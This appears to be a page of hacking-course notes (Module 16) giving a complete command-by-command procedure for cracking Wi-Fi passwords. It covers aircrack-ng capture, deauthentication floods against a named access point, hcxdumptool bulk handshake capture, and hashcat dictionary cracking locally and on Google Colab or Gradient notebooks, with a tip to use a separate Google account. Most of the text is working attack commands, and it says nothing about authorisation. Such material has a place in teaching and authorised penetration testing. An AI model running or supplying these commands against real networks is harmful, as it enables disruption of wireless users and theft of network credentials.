16 - Hacking Wireless
Module 16 - Hacking Wireless Network
WEP/WPA/WPA2 Cracking using AIRCRACK-NG
Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security such as:
Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2).
Phases
Capture the 4-Way Handshake with Airmon‐ng
Crack the handshake with Aircrack‐ng
Brute Force
Dictionary
Phase 1 - Capture the Handshake
Put your Wifi card in monitor mode (By default, the Wifi cards capture only that traffic which is intended for your device. By putting it in monitor mode, you are telling your Wifi card to capture all wireless traffic).
iwconfig
-> Checks for existing Wifi adapterùairmon‐ng start wlan0
-> Activate Monitor Modeiwconfig -> Check the device name
Capture traffic with airodump‐ng (This tool captures all the traffic that your wireless adapter can see and displays information about it eg: BSSID (the MAC address of the AP), channel, speed, encryption (if any), ESSID or SSID.
airodump‐ng wlan0mon
-> Use your card name
Now start capturing the related traffic of your target AP.
airodump‐ng ‐c 6 ‐‐bssid C0:F6:C2:5E:8D:20 ‐w pass wlan0mon
‐c 6 is the channel for the wireless network
‐‐bssid C0:F6:C2:5E:8D:20 is the access point MAC address. This eliminates extraneous traffic.
‐w pass is the file name
‐wlan0mon is the interface name.
Now start capturing the related traffic of your target AP
airodump‐ng ‐c 6 ‐‐bssid C0:F6:C2:5E:8D:20 ‐w pass wlan0mon
Deauthenticate the Wireless clients.
aireplay‐ng ‐0 100 ‐a C0:F6:C2:5E:8D:20 wlan0mon
‐‐0 means deauthentication
100 is the number of deauth packets to send
‐a C0:F6:C2:5E:8D:20 is the access point MAC address
‐wlan0mon is the interface name.
Look for the WPA Handshake in the Notification
Press CTRL + C , Once you have handshake
Phase 2 - Cracking password
Now you can use the following command to break the password with Dictionary attack
aircrack‐ng ‐w /usr/share/wordlists/rockyou.txt ‐b C0:F6:C2:5E:8D:20 pass*.cap
‐w rockyou.txt is the dictionary file. Kali has this inbuilt dictionary already installed
Pass*.cap is the packet file where a captured handshake is stored.
Sometimes the password list is compressed and you may need to perform these steps to uncompress the file:
locate rockyou
Now uncompress the file:
gunzip /usr/share/wordlists/rockyou.txt.gz
ls /usr/share/wordlists/
aircrack‐ng pass*.cap ‐w /usr/share/wordlists/rockyou.txt
And well search/found password!!
Best Alternate Wordlists Collections
https://weakpass.com/
https://github.com/danielmiessler/SecLists/tree/master/Pass words/WiFi-WPA
https://labs.nettitude.com/blog/rocktastic/
https://github.com/kennyn510/wpa2-wordlists
WEP Cracking – AIRCRACK-NG
aircrack-ng '/root/Desktop/Sample Captures/WEPcrack-01.cap'
‘’ are not needed if there is no space in folder name.
We can digit aricrack-ng and drag-and-drop file pcap on terminal.
WPA2 Cracking – AIRCRACK-NG
aircrack-ng -a 2 -b 20:E5:2A:E4:38:00 -w /root/Desktop/Wordlists/Passwords.txt '/root/Desktop/Sample Captures/WPA2crack-01.cap'
-a 2: mode WPA2
-b: BSSID, we can retrieve it in the frame of pcap file.
-w: wordlist
Capturing Handshakes with Hcxdumptool
Capturing Handshakes is the first step and most important step for cracking wifi password. Hcxdumptool provides another method to capture the handshakes and is the recommended method to capture packets by Hashcat developers which is another excellent password cracking tool.
Hcxdumptool is an easy and straightforward way to capture handshakes.
You do not need to de authenticate the clients
You can capture handshakes in bulk for all available networks which makes the whole process much simpler
By default, the tool does not come with Kali linux and you may need to install it: sudo apt‐get install hcxdumptool
Check the wifi adapters available on your machine
iwconfig
-> Check the device name
Stop the services that may interfare with handshake capture
sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant
After the handshake is captured you can restart the services with following command:
sudo systemctl start NetworkManager
Scan for available networks
sudo hcxdumptool ‐i wlan0 ‐‐do_rcascan
Capture traffic with hcxdumptool
sudo hcxdumptool ‐i wlan0 ‐o dumpfile.pcapng –active_beacon –enable_status=15
dumpfile.pacapng is the file where handshake will be stored
‐wlan0mon is the interface name.
After a minute or two, stop the capture with Ctrl+C and you will have your captured packets file stored in your home directory
Preparing captured Handshakes for Cracking
Convert Handshakes captured through Hcxdumptool
Install the hcxpcapngtool
sudo apt‐get install hcxtools
Convert the captured file with the tool
hcxpcapngtool ‐o hash.hc22000 ‐E essidlist dumpfile.pcapng
‐hash.hc22000 is the converted file
Essid list will contain the list of SSIDs
Dumpfile.pcapng is the source file
Convert the captured file with the tool
hcxpcapngtool ‐o hash.hc22000 ‐E essidlist dumpfile.pcapng
Check the essidlist file for name of wifi networks
nano essidlist
Sometimes wifi networks leak passwords and here we can see if there is some leaked password without even cracking something
Check the BSSID of our network
sudo hcxdumptool ‐i wlan0 ‐‐do_rcascan
Delete the excessive information and keep only the target network handshakes
nano hash.hc22000
Now, we have our converted file hash.hc22000. Just copy it from Vmware machine to your main Windows Machine
Convert Handshakes captured through Aircrack suite
Copy the .cap file from VB machine to Windows machine
Use the following official website from hashcat developers to convert the file to proper format(.hc2200): https://hashcat.net/cap2hashcat/
Download the converted file
Cracking Handshakes with Hashcat
Cracking Handshakes on Windows with Powerful graphics card
Install the Hashcat from official website https://hashcat.net/hashcat/
Copy the handshake file to hashcat directory
Download and extract the rockyou dictionary in hashcat folder https://github.com/brannondorsey/naive‐hashcat/releases/download/data/rockyou.txt
Open the Power shell and then use the command to crack the handshake
.\Hashcat.exe ‐m 22000 ‐a 0 ‐o cracked.txt hash.hc22000 rockyou.txt
22000 tells the hashcat that its wifi password to be cracked
Cracked.txt will store cracked passwords
Hash.hc22000 is the source file
Rockyou.txt is the dictionary file
Cracking Handshakes in cloud with Google collab
Google Collab is a free service offered by google to students to train their ML models.
There are a few jupyter notebooks already created by experts which can be utilized to crack the password. Do not abuse the service as its use may be restricted on abuse.
Open any of the following links while signed in with your Google account (Separate account is preferred)
https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ip ynb
https://colab.research.google.com/github/someshkar/colabcat/blob/master/colabc at.ipynb
https://colab.research.google.com/github/ShutdownRepo/google‐colab‐ hashcat/blob/main/google_colab_hashcat.ipynb
Install hashcat and required dictionaries while following instructions
Upload your hash file to an online file hosting provider like filebin.com or catbox.moe and then import it in your notebook with the following command in a new block
wget http://filebin.com/filename
Crack the handshake with following command
!hashcat ‐‐status ‐m 22000 ‐a 0 ‐o cracked.txt hash.hc22000 /content/wordlists/rockyou.txt
Cracking Handshakes in cloud with Gradient
Sign up for a gradient account
https://gradient.run/
Copy Block by Block, the code from following repo to a new notebook
https://colab.research.google.com/github/ShutdownRepo/google‐colab‐ hashcat/blob/main/google_colab_hashcat.ipynb
Use the same commands to crack the handshake as we used in google collab
wget http://filebin.com/filename
!hashcat ‐‐status ‐m 22000 ‐a 0 ‐o cracked.txt hash.hc22000 /content/wordlists/rockyou.txt
Last updated